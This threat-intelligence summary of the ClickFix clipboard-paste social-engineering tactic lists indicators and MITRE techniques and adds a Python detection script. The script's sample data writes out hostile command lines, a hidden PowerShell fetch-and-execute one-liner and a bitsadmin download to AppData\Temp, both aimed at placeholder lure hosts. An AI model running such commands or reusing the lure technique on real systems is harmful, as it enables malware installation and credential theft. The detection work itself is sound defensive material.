Keypoints
- ClickFix tricks users into executing clipboard-injected commands via deceptive web pages (Google Meet, fake reCAPTCHA), leading to remote payload download and execution.
- The tactic targets both Windows (mshta, PowerShell, bitsadmin chains) and macOS (direct .dmg downloads installing Amos Stealer).
- Delivery vectors include compromised sites, redirection chains from illicit sites, and abuse of trusted platforms like GitHub issues to lure developers.
- Detection opportunities focus on process-tree anomalies (mshta → bitsadmin/PowerShell), suspicious PowerShell network activity, and file operations in AppData\Temp.
- Network-based detection can spot the ClickFix pattern by correlating small instruction fetches followed shortly by large binary downloads from the same host.
- Several intrusion sets and brokers (TA571, APT28) have adopted ClickFix, making continuous tracking and multi-source detection essential.
MITRE Techniques
- [T1203] Execution – Exploits user interaction with malicious web content to execute code.
- [T1071] Command and Control – Uses multiple command-and-control domains to maintain communication with compromised systems.
- [T1003] Credential Dumping – Retrieves user credentials from compromised systems as part of follow-on activity.
- [T1041] Exfiltration Over C2 Channel – Transfers data from the victim’s system to an external location controlled by attackers.
- [T1105] Remote File Copy – Downloads files from remote locations to the compromised host (bitsadmin, PowerShell).
- [T1059] Command and Scripting Interpreter – Executes malicious scripts (PowerShell, VBScript via mshta) to perform the attack chain.
Indicators of Compromise
- [Domain] public IP lookup / telemetry – api.ipify[.]org (used to retrieve victim public IP), and multiple unspecified C2 domains observed in the campaign.
- [File extension / payload] delivery artifacts – .dmg (Amos Stealer on macOS), .zip archives used to deliver Windows payloads and resulting .exe / .dll files.
- [Processes / binaries] abused legitimate tools – mshta.exe, bitsadmin.exe, powershell.exe (used as parent/child processes in infection chains).
- [File path] persistence / staging location – files saved under AppData\Local\Temp (payloads and extracted binaries stored and executed there).
- [Web pages / pages] lure pages and delivery vectors – fake Google Meet and fake reCAPTCHA pages, and exploitation of GitHub issues / redirection chains from cracked-software or streaming sites.
————
ClickFix deceives users with believable web UI elements (fake meeting or CAPTCHA pages) to guide them through keyboard shortcuts that paste and run a malicious command from the clipboard. That command typically invokes mshta or PowerShell to fetch a small instruction script and then a larger payload; on macOS the flow can download a .dmg (Amos Stealer), while on Windows it often uses mshta → VBScript → bitsadmin or PowerShell → download and execute from AppData\Temp.
Detection is most reliable when endpoint and network telemetry are correlated: look for mshta child processes launching bitsadmin or PowerShell with URLs on the command line, a PowerShell user-agent making a very small HTTP GET followed shortly by a large binary download from the same host, and file writes to AppData\Temp followed by execution. Because the commands are simple (IWR/IEX one-liners or base64-encoded commands), rules that combine process-tree, file activity and temporal network patterns (e.g., instruction fetch then payload fetch within minutes) reduce false positives.
Defenders should monitor for the specific process-parent relationships (mshta → bitsadmin/wscript/powershell), unusual use of BITS to download executables, and low-volume instruction fetches from rarely seen domains or domains mimicking Google/Zoom. Maintain threat intelligence feeds for actor-linked indicators (TA571, APT28) and update detection rules as ClickFix delivery chains evolve to stay ahead of these social-engineering campaigns.
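The two detection ideas above (the mshta → bitsadmin/PowerShell process-tree rule and the "tiny instruction fetch, then large binary from the same host" network correlation) as one runnable Python example. This is an added illustration, not code from the Sekoia post; the process events, the pipe-separated proxy log, the host names and `.invalid` domains are all constructed, and the size and time thresholds (2 KiB, 1 MiB, 10 minutes) are assumptions to be tuned per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed EDR-style process events (parent -> child with command line).
PROCESS_EVENTS = [
    {"ts": "2024-10-15T10:02:11", "host": "WS-01", "parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://meet-lure.invalid/s.txt | iex"'},
    {"ts": "2024-10-15T10:02:15", "host": "WS-01", "parent": "mshta.exe", "image": "bitsadmin.exe",
     "cmdline": "bitsadmin /transfer j http://meet-lure.invalid/pkg.zip "
                "C:\\Users\\u\\AppData\\Local\\Temp\\pkg.zip"},
    # Benign: an admin script started from the desktop, no URL on the command line.
    {"ts": "2024-10-15T10:05:00", "host": "WS-02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]

# Constructed proxy log, pipe-separated: timestamp|client|user_agent|method|url|bytes
PROXY_LOG = """\
2024-10-15T10:02:12|WS-01|Mozilla/5.0 WindowsPowerShell/5.1.19041|GET|http://meet-lure.invalid/s.txt|412
2024-10-15T10:02:40|WS-01|Mozilla/5.0 WindowsPowerShell/5.1.19041|GET|http://meet-lure.invalid/pkg.zip|3145728
2024-10-15T10:05:01|WS-02|Mozilla/5.0 WindowsPowerShell/5.1.19041|GET|http://updates.example.invalid/manifest.json|900
2024-10-15T11:30:00|WS-03|Mozilla/5.0 (Windows NT 10.0) Chrome/118|GET|http://cdn.example.invalid/big.iso|52428800
"""

# Script hosts and download tools that ClickFix chains spawn from mshta.
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "bitsadmin.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
TEMP_RE = re.compile(r"appdata\\(local\\)?temp", re.IGNORECASE)


def detect_process_tree(events):
    """Endpoint rules: (1) mshta.exe spawning a script/download tool with a URL on its
    command line; (2) any bitsadmin transfer whose destination is under AppData\\...\\Temp.
    Returns (host, rule_name, child_image) tuples; one event may trigger both rules."""
    alerts = []
    for ev in events:
        cmd, child = ev["cmdline"], ev["image"].lower()
        has_url = bool(URL_RE.search(cmd))
        if ev["parent"].lower() == "mshta.exe" and child in LOLBIN_CHILDREN and has_url:
            alerts.append((ev["host"], "mshta_spawns_downloader", child))
        if child == "bitsadmin.exe" and "/transfer" in cmd.lower() and has_url and TEMP_RE.search(cmd):
            alerts.append((ev["host"], "bits_download_to_temp", child))
    return alerts


def parse_proxy_log(text):
    """Parse the constructed pipe-separated proxy format into dicts with a parsed timestamp
    and the URL's host part (the correlation key)."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, ua, method, url, nbytes = line.split("|")
        records.append({"ts": datetime.fromisoformat(ts), "client": client, "ua": ua,
                        "method": method, "url": url, "bytes": int(nbytes),
                        "url_host": url.split("/")[2].lower()})
    return records


def detect_fetch_then_payload(records, window=timedelta(minutes=10), small_max=2048, large_min=1_048_576):
    """Network rule: a PowerShell user-agent fetches a tiny instruction file and, within
    `window`, pulls a large binary from the same host for the same client.
    Returns (client, url_host, instruction_url, payload_url) tuples."""
    by_key = defaultdict(list)
    for r in records:
        if "powershell" in r["ua"].lower() and r["method"] == "GET":
            by_key[(r["client"], r["url_host"])].append(r)
    alerts = []
    for (client, host), rs in by_key.items():
        rs.sort(key=lambda r: r["ts"])
        for i, small in enumerate(rs):
            if small["bytes"] > small_max:
                continue
            for big in rs[i + 1:]:
                if big["ts"] - small["ts"] > window:
                    break  # sorted, so nothing later is inside the window either
                if big["bytes"] >= large_min:
                    alerts.append((client, host, small["url"], big["url"]))
                    break
    return alerts


if __name__ == "__main__":
    for a in detect_process_tree(PROCESS_EVENTS):
        print("PROCESS", a)
    for a in detect_fetch_then_payload(parse_proxy_log(PROXY_LOG)):
        print("NETWORK", a)
```

On the sample data the process rules fire only for WS-01 (the `explorer.exe` → `powershell.exe` backup script on WS-02 has no URL and is not flagged), and the network rule fires once, for the 412-byte `s.txt` followed 28 seconds later by a 3 MiB `pkg.zip` from the same host; WS-02's lone small fetch and WS-03's browser-driven large download do not match. Keying the network rule on (client, host) and requiring a PowerShell user-agent is what keeps ordinary large downloads out of the alert stream.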
————
Read more: https://blog.sekoia.io/clickfix-tactic-revenge-of-detection/